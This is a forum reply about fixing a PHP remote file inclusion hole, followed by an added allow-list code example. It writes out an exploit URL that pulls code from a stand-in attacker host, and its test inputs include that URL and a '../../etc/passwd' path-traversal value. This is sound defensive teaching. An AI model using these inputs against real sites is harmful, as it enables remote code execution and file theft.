Reply to Re: PHP script help

Posted by Colin McKinnon on 01/15/07 22:50

SA SA wrote:

> Hello,
> I do not know anything about PHP but was thrown into this mix. I was told
> by my ISP that there is a vulnerability in the following code that allows
> a spammer to load an offsite PHP script for mailing.

There are 2 very odd things about this:

1) that you have an ISP who is willing to take the time to read your code
(interesting, and a big plus)

2) that your host is not configured to prevent this (a bit worrying,
depending on the reason for 1).

To exploit this, someone just has to enter a URL like:

http://www.sasas-site.com/code.php?sport=http%3A%2F%2Fwww.blackhat.net%2Fmalware.src

to get their code into your ISP's webserver.

> How do I fix it?
>

Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
values.

C.
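
The "restrict it to a specific list of values" fix from the reply above, as an added example that is not part of the original post or the poster's script. The original code is not shown on this page, so the page names, the `resolve_sport_page()` helper and the demo directory are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical names throughout: the original script is not shown on this page,
// so the page files and the 'sport' values below are constructed for illustration.

/**
 * Map the request parameter to a local file through a fixed allow-list.
 * The user's value is only ever used as an array key, never as a path or URL.
 */
function resolve_sport_page($sport, array $allowed, string $baseDir): ?string
{
    // Reject arrays (?sport[]=x) and anything that is not an exact known key.
    if (!is_string($sport) || !array_key_exists($sport, $allowed)) {
        return null;
    }
    // Defence in depth: the mapped file must exist and sit inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$sport]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo setup: a temporary directory standing in for the site's pages.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sport_pages_demo';
@mkdir($baseDir);
file_put_contents($baseDir . '/football.php', '<?php echo "football page\n";');
file_put_contents($baseDir . '/tennis.php', '<?php echo "tennis page\n";');
$allowed = ['football' => 'football.php', 'tennis' => 'tennis.php'];

// Constructed inputs; in the real script the value would come from $_GET['sport'].
$inputs = ['football', 'http://www.blackhat.net/malware.src', '../../etc/passwd', ['x']];
foreach ($inputs as $sport) {
    $page = resolve_sport_page($sport, $allowed, $baseDir);
    if ($page === null) {
        echo 'rejected: ' . json_encode($sport) . "\n"; // a real script would send a 404
        continue;
    }
    include $page; // only ever a file named in $allowed
}
```

On the host side, the php.ini directive `allow_url_include = Off` (PHP 5.2.0 and later) stops `include` from fetching remote URLs at all, independently of the script's own checks.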
